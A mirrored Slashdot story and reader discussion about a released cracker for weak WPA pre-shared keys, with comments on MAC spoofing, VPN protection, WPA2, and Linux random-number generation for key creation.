Slashdot Mirror
WPA Weak Key Cracker Posted
Glenn Fleishman writes "The folks at TinyPEAP released a cracking tool to break Wi-Fi Protected Access (WPA) keys. WPA is the replacement for weak WEP keys in the original 802.11b specification. Robert Moskowitz of ICSA Labs released a paper almost exactly a year ago documenting how WPA keys that were short and lacked randomnness could be subject to cracks. This tool automates the process. Moskowitz advised choosing passphrases of more than 20 characters or generating random keys of at least 96 bits, but preferably 128 bits. Some tools exist to produce better keys, including chipmaker Broadcom's SecureEZSetup (in selected hardware) and Buffalo Technologies' hardware-based AOSS for automatic key generation and propagation. Enterprise-based WPA with 802.1X doesn't have this weakness: each user gets a long WPA key that's randomly generated and uniquely assigned--and can be frequently changed during a session."
What's the big deal? Kismac has had this feature for a while. I hope i'm missing something.
"Upon attaching the waterblock to my penis, I began to notice that I know nothing about computers." -- JRockway
It does not have to be cracked, MAC filtering does not prevent from others listening the network.
You make a good point, I know that I would not do any "online" banking with wifi.
roamingfeet
Um, do you know how easy it is to spoof MAC addresses? Very easy.
WEP
Er, you mean WPA?
94% of Repubs and 21% of Dems voted to renew the Patriot Act
NOT really a good idea to start a thread about morons, and then act like one.
_YOUR_ wlan card may have the MAC address burned into it. Once ALL NIC did. I think it was more than 10 years ago that I saw my first NIC that DID NOT HAVE a MAC address (it was all zeroes, and expected to be set in software).
_MY_ wlan card will _CERTAINLY_ let me change the MAC address - under Linux _or_ Windows.
http://www.theboyz.biz/Computers, parts, electronics, small appliances and more!
If you're not living on the edge, you're just taking up space!
arghh - let's blame my caffeine consumption...
Here's the a correct link
I don't read replies by ACs.
Do your homework. Look up Supplicant, XSupplication, HostAP, 802.11i for Linux, 802.1x for Linux, etc, etc, etc... Lots of things going on.
ITMT... This crack is only for weak keys with WPA-PSK. Not applicable to WPA enterprise or WPA2.
No, you don't have to do this. Once the WEP key is broken (or if there is no WEP key, just MAC filtering), you simply listen to the traffic to get a MAC address that's allowed, and use that.
Regards,
--
*Art
How many home networks really need to allow random MAC addresses access?
This issue is a bit more complicated than you think.
just generate a key from /dev/urandom on nix.
doesn't get any more random than that.
;)
and im fairly certian it won't be compromised any time in the near future
--kingpunk
Looked at OpenVPN? Seems a lot easier to configure than a VPN.
The best thing you can do in addition to using WEP, changing keys, and locking down the MAC addresses allowed, is to use ssh or VPN software to encrypt your connections. If someone spends enough time to crack WEP and spoof a MAC address then the most they can get is access through your access point. They would have to break ssh or VPN to look at your data. Of course you would need to have tools in place to identify a man in the middle attack to prevent them from spoofing your connections.
Of course if someone spends that much effort just to break into your wireless network you either have something really important or they are have way to much time on their hands. (and I doubt if anyone has anything that important on their network....)
MAC adresses are universally unique identifiers, except for a few duplicate runs in cheap-ass brand NICs.
It's just that they cannot be authenticated in any way. It's like allowing only people who claim to be you on your network, rather than people who can prove it in some way.
SCO employee? Check out the bounty
The frame control that contains the MAC header in an 802.11 packet is always unencrypted. So the list of MAC addresses is available at once, before key cracking.
KisMAC has had this function for a long time. Someone used it at Hope 2004 to their wifi key. In addition, Josh Wright has had a working copy available for linux for some time. The LiveCD from Remote-exploit.org (Auditor) has included this tool for about a month now. This is not new...
Note that WPA is just like WEP but with quickly rotating keys and more secure key exchange. Yeah, you can't crack it in real-time to get on the network... but if you listen to the vendors carefully, they'll even say it... "Authentication, Authorization.... " But never will they formally say "Secure encryption of data"
You can decode everything but the key exchange off-line.
VPN software is the only way to go. The wireless vendors are liars.
Does anyone want to comment on WPA2? Does it require new hardware?
> just generate a key from /dev/urandom on nix. doesn't get any more random than that
/dev/urandom is not random at all, it is pseudo-random at best.
Maybe you are talking about a specific implementation here (Linux I bet) and detaisl are sightly different between different unix like systems...
The basic issue is that as soon as you think up a process that generates numbers in a way that you can describe mathematically, you also end up with a process uncapable of generating real randomness.
You can get most aspects of randomness, but what you won't get, and that is the most important part for encryption, is unpredictability.
How predictable things are depends for a bit on the algorithm that you use, and for a large part on the abbility to deduct the current state of the 'random generator'. If those 2 are known, the next number your random generator will produce can also be known.
This is why it is so important to have a good entropy source, it makes it virtually impossible to guess at the state of the generator.
> /dev/urandom is not random at all, it is pseudo-random at best.
/dev/urandom returns very high quality pseudo-random at _worst_. /dev/random never resorts to mere pseudo randomness, and read(2)s on it block until the kernel has accumulated enough entropy in its pool. (yes, Linux maintains an entropy pool which it seeds from random events so there is some true randomness waiting for programs like gnupg or statistical simulations that need it.)
/dev/random doesn't come from a purely algorithmic source. Kernels have access to more than just a Turing machine :).
:), so even if the samples aren't very random, they don't make it worse.
On Linux, that's wrong.
You're correct about everything else, though. The only thing you didn't know is that
> This is why it is so important to have a good entropy source, it makes it
> virtually impossible to guess at the state of the generator.
Now you're talking. That's why Linux uses the low bits of the CPU's clock cycle counter sampled during interrupts (which are generated by disks, the network, keyboards, and mice, etc. i.e. fairly unpredictable things, esp. wrt. exact numbers of CPU cycles!) It mixes these samples into its pool with cryptographically strong algorithms (insert hand-waving here...
If you're totally paranoid, RML's netdev-random patch will let you choose whether you want to add entropy from network interrupts to the entropy pool. Of course, you could also use rngd from rng-tools to feed entropy from your chipset's built-in rng (which measure thermal noise, and so has randomness that fairly directly from quantum mechanical processes, the only known source of true unpredictability in the Universe.)
#define X(x,y) x##y
Peter Cordes ; e-mail: X(peter@cordes ,